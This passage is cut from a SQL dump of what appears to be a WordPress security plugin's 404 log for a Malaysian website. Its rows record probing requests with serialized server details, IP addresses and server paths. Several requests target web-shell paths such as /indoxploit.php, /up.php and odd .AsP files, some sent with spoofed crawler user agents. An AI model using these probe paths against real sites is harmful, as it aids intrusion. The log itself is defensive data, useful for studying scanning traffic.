Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"221.3.170.102\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"221.3.170.102\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/cjcx/mipingyi.AsP\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/cjcx/mipingyi.AsP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG-0t2Cd74l7secq5l1IwAAAVA\";s:12:\"REDIRECT_URL\";s:18:\"/cjcx/mipingyi.AsP\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"65019\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/cjcx/mipingyi.AsP\";s:10:\"SCRIPT_URL\";s:18:\"/cjcx/mipingyi.AsP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG-0t2Cd74l7secq5l1IwAAAVA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930066.8027\";s:12:\"REQUEST_TIME\";s:10:\"1571930066\";}}','notice','2019-10-24 15:14:28','2019-10-24 15:14:27',35271200,37074528,'http://bintara.com.my//cjcx/mipingyi.AsP',1,0,'221.3.170.102'),(28964,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//cjcx/mipingyi.AsP\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"118.147.136.139\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"118.147.136.139\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/cjcx/mipingyi.AsP\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/cjcx/mipingyi.AsP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG-xEq-QPicCh3WFsYmewAAAJg\";s:12:\"REDIRECT_URL\";s:18:\"/cjcx/mipingyi.AsP\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"64834\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/cjcx/mipingyi.AsP\";s:10:\"SCRIPT_URL\";s:18:\"/cjcx/mipingyi.AsP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG-xEq-QPicCh3WFsYmewAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930052.6687\";s:12:\"REQUEST_TIME\";s:10:\"1571930052\";}}','notice','2019-10-24 15:14:14','2019-10-24 15:14:13',35268008,37064168,'http://bintara.com.my//cjcx/mipingyi.AsP',1,0,'118.147.136.139'),(28963,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//cjcx/mipingyi.AsP\";s:14:\"CONTENT_LENGTH\";s:3:\"400\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.147.209.81\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.147.209.81\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/cjcx/mipingyi.AsP\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/cjcx/mipingyi.AsP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG-sf5cHc@dX2BdZ47IuQAAABI\";s:12:\"REDIRECT_URL\";s:18:\"/cjcx/mipingyi.AsP\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"64581\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/cjcx/mipingyi.AsP\";s:10:\"SCRIPT_URL\";s:18:\"/cjcx/mipingyi.AsP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG-sf5cHc@dX2BdZ47IuQAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930033.5184\";s:12:\"REQUEST_TIME\";s:10:\"1571930033\";}}','notice','2019-10-24 15:13:55','2019-10-24 15:13:53',35267152,37066656,'http://bintara.com.my//cjcx/mipingyi.AsP',1,0,'211.147.209.81'),(28962,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//style/kongya.AsPX\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"117.76.65.146\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"117.76.65.146\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/style/kongya.AsPX\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/style/kongya.AsPX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG-i6HtjB8Y0WvpqtvLvAAAANA\";s:12:\"REDIRECT_URL\";s:18:\"/style/kongya.AsPX\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"64194\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/style/kongya.AsPX\";s:10:\"SCRIPT_URL\";s:18:\"/style/kongya.AsPX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG-i6HtjB8Y0WvpqtvLvAAAANA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571929995.193\";s:12:\"REQUEST_TIME\";s:10:\"1571929995\";}}','notice','2019-10-24 15:13:17','2019-10-24 15:13:15',35267224,37068888,'http://bintara.com.my//style/kongya.AsPX',1,0,'117.76.65.146'),(27518,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/wp-content/uploads/2019/10/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/wp-content/uploads/2019/10/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:28:\"/wp-content/uploads/2019/10/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfxFIhgyMNsP7cgznGrNAAAAU4\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/wp-content/uploads/2019/10/\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/wp-content/uploads/2019/10/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfxFIhgyMNsP7cgznGrNAAAAU4\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"52196\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/wp-content/uploads/2019/10/\";s:10:\"SCRIPT_URL\";s:28:\"/wp-content/uploads/2019/10/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfxFIhgyMNsP7cgznGrNAAAAU4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238740.9943\";s:12:\"REQUEST_TIME\";s:10:\"1570238740\";}}','notice','2019-10-05 01:25:43','2019-10-05 01:25:41',35038080,36851320,'https://bintara.com.my/wp-content/uploads/2019/10/',1,0,'51.79.4.180'),(27517,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/wp-content/uploads/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/uploads/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/wp-content/uploads/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfxDYUvsCPAO@kc@Ic6SAAAAFY\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/uploads/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/wp-content/uploads/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfxDYUvsCPAO@kc@Ic6SAAAAFY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"50332\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/uploads/\";s:10:\"SCRIPT_URL\";s:20:\"/wp-content/uploads/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfxDYUvsCPAO@kc@Ic6SAAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238733.1893\";s:12:\"REQUEST_TIME\";s:10:\"1570238733\";}}','notice','2019-10-05 01:25:36','2019-10-05 01:25:33',35032840,36827592,'https://bintara.com.my/wp-content/uploads/',1,0,'51.79.4.180'),(27516,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/upload.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/upload.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/upload.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfxBIhgyMNsP7cgznGrLQAAAUU\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/upload.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/upload.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfxBIhgyMNsP7cgznGrLQAAAUU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"64664\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/upload.php\";s:10:\"SCRIPT_URL\";s:11:\"/upload.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfxBIhgyMNsP7cgznGrLQAAAUU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238726.1974\";s:12:\"REQUEST_TIME\";s:10:\"1570238726\";}}','notice','2019-10-05 01:25:28','2019-10-05 01:25:26',35035064,36839608,'https://bintara.com.my/upload.php',1,0,'51.79.4.180'),(27515,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:7:\"/up.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/up.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:7:\"/up.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfw-b-TGwg8JtoKWMVXaQAAABA\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/up.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/up.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfw-b-TGwg8JtoKWMVXaQAAABA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"62804\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"https://bintara.com.my/up.php\";s:10:\"SCRIPT_URL\";s:7:\"/up.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfw-b-TGwg8JtoKWMVXaQAAABA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238717.6693\";s:12:\"REQUEST_TIME\";s:10:\"1570238717\";}}','notice','2019-10-05 01:25:20','2019-10-05 01:25:18',35034792,36834824,'https://bintara.com.my/up.php',1,0,'51.79.4.180'),(27514,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/indoxploit.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/indoxploit.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/indoxploit.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfw8b-TGwg8JtoKWMVXXAAAAAk\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/indoxploit.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/indoxploit.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfw8b-TGwg8JtoKWMVXXAAAAAk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"59917\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_